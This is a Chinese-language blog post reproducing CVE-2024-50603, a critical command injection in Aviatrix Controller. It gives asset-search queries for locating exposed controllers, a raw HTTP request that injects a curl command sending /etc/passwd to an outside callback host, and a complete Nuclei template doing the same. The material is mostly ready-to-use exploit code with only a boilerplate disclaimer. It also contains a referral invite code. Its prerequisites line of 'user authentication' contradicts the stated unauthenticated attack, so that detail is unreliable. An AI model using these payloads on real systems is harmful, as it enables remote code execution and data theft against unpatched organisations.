【漏洞复现】CVE-2024-50603

发布于 作者:

【漏洞复现】CVE-2024-50603

混子Hacker 混子Hacker 2025-01-12 12:54

免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不承担任何法律及连带责任。


漏洞简介 
]

——  
越努力越幸运 ——

CVE-2024-50603

Aviatrix Controller受影响版本中,由于对 /v1/api 下 list_flightpath_destination_instances 操作中的 cloud_type 参数或 flightpath_connection_test 操作中的 src_cloud_type 参数缺乏适当的输入清理,可能导致命令注入漏洞,未经身份验证的远程攻击者可以构造恶意请求,利用该漏洞执行任意命令。

影响范围

Aviatrix Controller < 7.1.4191

Aviatrix Controller 7.2.x < 7.2.4996

漏洞评分

10.0

利用条件

用户认证


利用难度


所需权限

解决方案

升级版本

漏洞信息

混子Hacker

01

资产测绘 

fofa: app="aVIaTrIX-Controller"
Quake:app:"Aviatrix Controller"

# 风里雨里,我都在quake等你。个人中心输入邀请码“lnBNF0”你我均可获得5,000长效积分哦,地址 quake.360.net

混子Hacker**

02

漏洞复现 

POST /v1/api HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Connection: close
Content-Length: 193
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1&region=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+http://dnglog)

混子Hacker**

03

Nuclei Poc 

id: CVE-2024-50603
info:
  name: Aviatrix Controller RCE
  author: newlinesec,securing.pl
  severity: critical
  description: |
    An issue was discovered in Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996. Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test.
  reference:
    - https://www.securing.pl/en/cve-2024-50603-aviatrix-network-controller-command-injection-vulnerability/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-50603
    - https://docs.aviatrix.com/documentation/latest/network-security/index.html
    - https://docs.aviatrix.com/documentation/latest/release-notices/psirt-advisories/psirt-advisories.html?expand=true#remote-code-execution-vulnerability-in-aviatrix-controllers
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2024-50603
    cwe-id: CWE-78
  metadata:
    vendor: aviatrix
    product: controller
    zoomeye-query: app="Aviatrix Controller"
  tags: cve,cve2024,aviatrix,controller,rce,oast

variables:
  oast: "{{interactsh-url}}"

http:
  - raw:
      - |
        POST /v1/api HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1&region=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+{{oast}})

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        name: http
        words:
          - "http"

      - type: status
        status:
          - 200

      - type: regex
        part: interactsh_request
        regex:
          - 'root:.*:0:0:'

<<<  
END 

原创文章|转载请附上原文出处链接

更多漏洞|关注作者查看

作者|混子Hacker